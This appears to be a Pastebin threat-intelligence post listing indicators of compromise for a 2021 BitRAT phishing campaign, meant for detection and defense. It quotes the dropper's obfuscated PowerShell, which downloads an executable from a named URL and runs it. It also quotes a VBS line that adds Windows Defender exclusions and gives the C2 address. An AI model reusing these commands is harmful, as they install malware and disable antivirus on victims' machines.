ExecuteMalware

2021-08-10 Bitrat IOCs

Aug 10th, 2021 (edited)
11,084
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.80 KB | None | 0 0
  1. THREAT IDENTIFICATION: BITRAT
  2.  
  3. SUBJECTS OBSERVED
  4. Separate Remittance Notice : Paper Document No: 341930290
  5.  
  6. SENDERS OBSERVED
  7. abiel@timberpines.com
  8.  
  9. DOCUMENT FILE HASHES
  10. Remit_Scan 8.10.21.doc
  11. 3ad29bdfead859c703ec80cca76409e5
  12.  
  13. Password
  14. 081021
  15.  
  16. POWERSHELL FROM MALDOC
  17. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=($we22='(New-Obje' + 'ct Net.We'; $b4df='bCl' + 'ient).Downlo'; $c3='adFile(''http://augustair.com/Resources/eft/edi.exe'',$env:temp+''\mail.exe'')';$TC=IEX ($we22,$b4df,$c3 -Join '');start-process($env:temp+ '\mail.exe')) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
  18.  
  19. PAYLOAD DOWNLOAD URL
  20. http://augustair.com/Resources/eft/edi.exe
  21.  
  22. PAYLOAD FILE HASH
  23. edi.exe
  24. 537d313f3dfe75d7a9d4f36f80cce049
  25.  
  26. VBS FILE HASH
  27. _Kthavoimchnr.vbs
  28. dfeff1f15472010a44f33a0d9344cfd9
  29.  
  30. VBS FILE CONTENTS
  31. CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\analyst\AppData\Roaming\outlook.exe'", 0, False
  32.  
  33. BITRAT C2
  34. 23.94.54.231:3050
  35.  
  36. SUPPORTING EVIDENCE
  37. https://urlhaus.abuse.ch/url/1506968/
  38.  
  39. FROM THE PACKET CAPTURE
  40. ....q...m..u..|../...BdV.o......#ZZ..xz?.............k.g.9.3.....=.<.5./.....(.#...........
  41. ..... .
  42. ......................U...Q..a...>....N..V...{...:R._,...{.
  43. 5 .C...ak.(......<.%.....%q...-..~.... ...................0...0............RK.7.M.X.P.o..0
  44. . *.H..
  45. .....0.1.0
  46. ..U....BitRAT0 .
  47. 210727000000Z..21200727000000Z0.1.0
  48. ..U....BitRAT0.."0
  49. . *.H..
  50. ..........0..
  51. ......
  52.  
  53. I also saw several Ping packets to 8.8.8.8
  54. Also DNS Queries for eter102.dvrlists.com
  55.  
  56. STRINGS IN THE MAIL.EXE PROCESS
  57. # Netscape HTTP Cookie File
  58. # https://curl.haxx.se/docs/http-cookies.html
  59. # This file was generated by libcurl! Edit at your own risk.
  60.  
  61. GammaCalibrator
Add Comment
Please, Sign In to add comment